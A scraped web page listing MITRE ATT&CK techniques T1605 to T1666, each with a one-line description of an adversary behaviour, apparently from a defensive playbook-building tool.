
Adversaries may use a compromised device as a proxy server to the Internet.

More Info

In Playbook

Command-Line Interface (T1605)

View on ATT&CK

Adversaries may use built-in command-line interfaces to interact with the device and execute commands.

More Info

In Playbook

Forge Web Credentials (T1606)

View on ATT&CK

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services.

More Info

In Playbook
Forge Web Credentials

Web Cookies (T1606.001)

View on ATT&CK

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.

More Info

In Playbook
Forge Web Credentials

SAML Tokens (T1606.002)

View on ATT&CK

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.

More Info

In Playbook

Stage Capabilities (T1608)

View on ATT&CK

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting.

More Info

In Playbook
Stage Capabilities

Upload Malware (T1608.001)

View on ATT&CK

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting.

More Info

In Playbook
Stage Capabilities

Upload Tool (T1608.002)

View on ATT&CK

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting.

More Info

In Playbook
Stage Capabilities

Install Digital Certificate (T1608.003)

View on ATT&CK

Adversaries may install SSL/TLS certificates that can be used during targeting.

More Info

In Playbook
Stage Capabilities

Drive-by Target (T1608.004)

View on ATT&CK

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing.

More Info

In Playbook
Stage Capabilities

Link Target (T1608.005)

View on ATT&CK

Adversaries may put in place resources that are referenced by a link that can be used during targeting.

More Info

In Playbook
Stage Capabilities

SEO Poisoning (T1608.006)

View on ATT&CK

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims.

More Info

In Playbook

Container Administration Command (T1609)

View on ATT&CK

Adversaries may abuse a container administration service to execute commands within a container.

More Info

In Playbook

Deploy Container (T1610)

View on ATT&CK

Adversaries may deploy a container into an environment to facilitate execution or evade defenses.

More Info

In Playbook

Escape to Host (T1611)

View on ATT&CK

Adversaries may break out of a container to gain access to the underlying host.

More Info

In Playbook

Build Image on Host (T1612)

View on ATT&CK

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry.

More Info

In Playbook

Container and Resource Discovery (T1613)

View on ATT&CK

Adversaries may attempt to discover containers and other resources that are available within a containers environment.

More Info

In Playbook

System Location Discovery (T1614)

View on ATT&CK

Adversaries may gather information in an attempt to calculate the geographical location of a victim host.

More Info

In Playbook
System Location Discovery

System Language Discovery (T1614.001)

View on ATT&CK

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

More Info

In Playbook

Group Policy Discovery (T1615)

View on ATT&CK

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.

More Info

In Playbook

Call Control (T1616)

View on ATT&CK

Adversaries may make, forward, or block phone calls without user authorization.

More Info

In Playbook

Hooking (T1617)

View on ATT&CK

Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection.

More Info

In Playbook

User Evasion (T1618)

View on ATT&CK

Adversaries may attempt to avoid detection by hiding malicious behavior from the user.

More Info

In Playbook

Cloud Storage Object Discovery (T1619)

View on ATT&CK

Adversaries may enumerate objects in cloud storage infrastructure.

More Info

In Playbook

Reflective Code Loading (T1620)

View on ATT&CK

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.

More Info

In Playbook

Multi-Factor Authentication Request Generation (T1621)

View on ATT&CK

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

More Info

In Playbook

Debugger Evasion (T1622)

View on ATT&CK

Adversaries may employ various means to detect and avoid debuggers.

More Info

In Playbook

Command and Scripting Interpreter (T1623)

View on ATT&CK

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

More Info

In Playbook
Command and Scripting Interpreter

Unix Shell (T1623.001)

View on ATT&CK

Adversaries may abuse Unix shell commands and scripts for execution.

More Info

In Playbook

Event Triggered Execution (T1624)

View on ATT&CK

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events.

More Info

In Playbook
Event Triggered Execution

Broadcast Receivers (T1624.001)

View on ATT&CK

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events.

More Info

In Playbook

Hijack Execution Flow (T1625)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications.

More Info

In Playbook
Hijack Execution Flow

System Runtime API Hijacking (T1625.001)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications.

More Info

In Playbook

Abuse Elevation Control Mechanism (T1626)

View on ATT&CK

Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions.

More Info

In Playbook
Abuse Elevation Control Mechanism

Device Administrator Permissions (T1626.001)

View on ATT&CK

Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device.

More Info

In Playbook

Execution Guardrails (T1627)

View on ATT&CK

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target.

More Info

In Playbook
Execution Guardrails

Geofencing (T1627.001)

View on ATT&CK

Adversaries may use a device’s geographical location to limit certain malicious behaviors.

More Info

In Playbook

Hide Artifacts (T1628)

View on ATT&CK

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection.

More Info

In Playbook
Hide Artifacts

Suppress Application Icon (T1628.001)

View on ATT&CK

A malicious application could suppress its icon from being displayed to the user in the application launcher.

More Info

In Playbook
Hide Artifacts

User Evasion (T1628.002)

View on ATT&CK

Adversaries may attempt to avoid detection by hiding malicious behavior from the user.

More Info

In Playbook
Hide Artifacts

Conceal Multimedia Files (T1628.003)

View on ATT&CK

Adversaries may attempt to hide multimedia files from the user.

More Info

In Playbook

Impair Defenses (T1629)

View on ATT&CK

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.

More Info

In Playbook
Impair Defenses

Prevent Application Removal (T1629.001)

View on ATT&CK

Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application.

More Info

In Playbook
Impair Defenses

Device Lockout (T1629.002)

View on ATT&CK

An adversary may seek to inhibit user interaction by locking the legitimate user out of the device.

More Info

In Playbook
Impair Defenses

Disable or Modify Tools (T1629.003)

View on ATT&CK

Adversaries may disable security tools to avoid potential detection of their tools and activities.

More Info

In Playbook

Indicator Removal on Host (T1630)

View on ATT&CK

Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself.

More Info

In Playbook
Indicator Removal on Host

Uninstall Malicious Application (T1630.001)

View on ATT&CK

Adversaries may include functionality in malware that uninstalls the malicious application from the device.

More Info

In Playbook
Indicator Removal on Host

File Deletion (T1630.002)

View on ATT&CK

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity.

More Info

In Playbook
Indicator Removal on Host

Disguise Root/Jailbreak Indicators (T1630.003)

View on ATT&CK

An adversary could use knowledge of the techniques used by security software to evade detection.

More Info

In Playbook

Process Injection (T1631)

View on ATT&CK

Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges.

More Info

In Playbook
Process Injection

Ptrace System Calls (T1631.001)

View on ATT&CK

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook

Subvert Trust Controls (T1632)

View on ATT&CK

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications.

More Info

In Playbook
Subvert Trust Controls

Code Signing Policy Modification (T1632.001)

View on ATT&CK

Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys.

More Info

In Playbook

Virtualization/Sandbox Evasion (T1633)

View on ATT&CK

Adversaries may employ various means to detect and avoid virtualization and analysis environments.

More Info

In Playbook
Virtualization/Sandbox Evasion

System Checks (T1633.001)

View on ATT&CK

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.

More Info

In Playbook

Credentials from Password Store (T1634)

View on ATT&CK

Adversaries may search common password storage locations to obtain user credentials.

More Info

In Playbook
Credentials from Password Store

Keychain (T1634.001)

View on ATT&CK

Adversaries may collect keychain data from an iOS device to acquire credentials.

More Info

In Playbook

Steal Application Access Token (T1635)

View on ATT&CK

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources.

More Info

In Playbook
Steal Application Access Token

URI Hijacking (T1635.001)

View on ATT&CK

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

More Info

In Playbook

Protected User Data (T1636)

View on ATT&CK

Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list.

More Info

In Playbook
Protected User Data

Calendar Entries (T1636.001)

View on ATT&CK

Adversaries may utilize standard operating system APIs to gather calendar entry data.

More Info

In Playbook
Protected User Data

Call Log (T1636.002)

View on ATT&CK

Adversaries may utilize standard operating system APIs to gather call log data.

More Info

In Playbook
Protected User Data

Contact List (T1636.003)

View on ATT&CK

Adversaries may utilize standard operating system APIs to gather contact list data.

More Info

In Playbook
Protected User Data

SMS Messages (T1636.004)

View on ATT&CK

Adversaries may utilize standard operating system APIs to gather SMS messages.

More Info

In Playbook

Dynamic Resolution (T1637)

View on ATT&CK

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations.

More Info

In Playbook
Dynamic Resolution

Domain Generation Algorithms (T1637.001)

View on ATT&CK

Adversaries may use [Domain Generation Algorithms](https://attack.

More Info

In Playbook

Adversary-in-the-Middle (T1638)

View on ATT&CK

Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.

More Info

In Playbook

Exfiltration Over Alternative Protocol (T1639)

View on ATT&CK

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

More Info

In Playbook
Exfiltration Over Alternative Protocol

Exfiltration Over Unencrypted Non-C2 Protocol (T1639.001)

View on ATT&CK

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

More Info

In Playbook

Account Access Removal (T1640)

View on ATT&CK

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.

More Info

In Playbook

Data Manipulation (T1641)

View on ATT&CK

Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity.

More Info

In Playbook
Data Manipulation

Transmitted Data Manipulation (T1641.001)

View on ATT&CK

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.

More Info

In Playbook

Endpoint Denial of Service (T1642)

View on ATT&CK

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.

More Info

In Playbook

Generate Traffic from Victim (T1643)

View on ATT&CK

Adversaries may generate outbound traffic from devices.

More Info

In Playbook

Out of Band Data (T1644)

View on ATT&CK

Adversaries may communicate with compromised devices using out of band data streams.

More Info

In Playbook

Compromise Client Software Binary (T1645)

View on ATT&CK

Adversaries may modify system software binaries to establish persistent access to devices.

More Info

In Playbook

Exfiltration Over C2 Channel (T1646)

View on ATT&CK

Adversaries may steal data by exfiltrating it over an existing command and control channel.

More Info

In Playbook

Plist File Modification (T1647)

View on ATT&CK

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses.

More Info

In Playbook

Serverless Execution (T1648)

View on ATT&CK

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments.

More Info

In Playbook

Steal or Forge Authentication Certificates (T1649)

View on ATT&CK

Adversaries may steal or forge certificates used for authentication to access remote systems or resources.

More Info

In Playbook

Acquire Access (T1650)

View on ATT&CK

Adversaries may purchase or otherwise acquire an existing access to a target system or network.

More Info

In Playbook

Cloud Administration Command (T1651)

View on ATT&CK

Adversaries may abuse cloud management services to execute commands within virtual machines.

More Info

In Playbook

Device Driver Discovery (T1652)

View on ATT&CK

Adversaries may attempt to enumerate local device drivers on a victim host.

More Info

In Playbook

Power Settings (T1653)

View on ATT&CK

Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines.

More Info

In Playbook

Log Enumeration (T1654)

View on ATT&CK

Adversaries may enumerate system and service logs to find useful data.

More Info

In Playbook

Masquerading (T1655)

View on ATT&CK

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

More Info

In Playbook
Masquerading

Match Legitimate Name or Location (T1655.001)

View on ATT&CK

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.

More Info

In Playbook

Impersonation (T1656)

View on ATT&CK

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf.

More Info

In Playbook

Financial Theft (T1657)

View on ATT&CK

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims.

More Info

In Playbook

Exploitation for Client Execution (T1658)

View on ATT&CK

Adversaries may exploit software vulnerabilities in client applications to execute code.

More Info

In Playbook

Content Injection (T1659)

View on ATT&CK

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic.

More Info

In Playbook

Phishing (T1660)

View on ATT&CK

Adversaries may send malicious content to users in order to gain access to their mobile devices.

More Info

In Playbook

Application Versioning (T1661)

View on ATT&CK

An adversary may push an update to a previously benign application to add malicious code.

More Info

In Playbook

Data Destruction (T1662)

View on ATT&CK

Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources.

More Info

In Playbook

Remote Access Software (T1663)

View on ATT&CK

Adversaries may use legitimate remote access software, such as `VNC`, `TeamViewer`, `AirDroid`, `AirMirror`, etc.

More Info

In Playbook

Exploitation for Initial Access (T1664)

View on ATT&CK

Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.

More Info

In Playbook

Hide Infrastructure (T1665)

View on ATT&CK

Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure.

More Info

In Playbook

Modify Cloud Resource Hierarchy (T1666)

View on ATT&CK

Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.

More Info

In Playbook

    Playbook Cart


    0 Techniques + Mappings
    0 Additional Countermeasures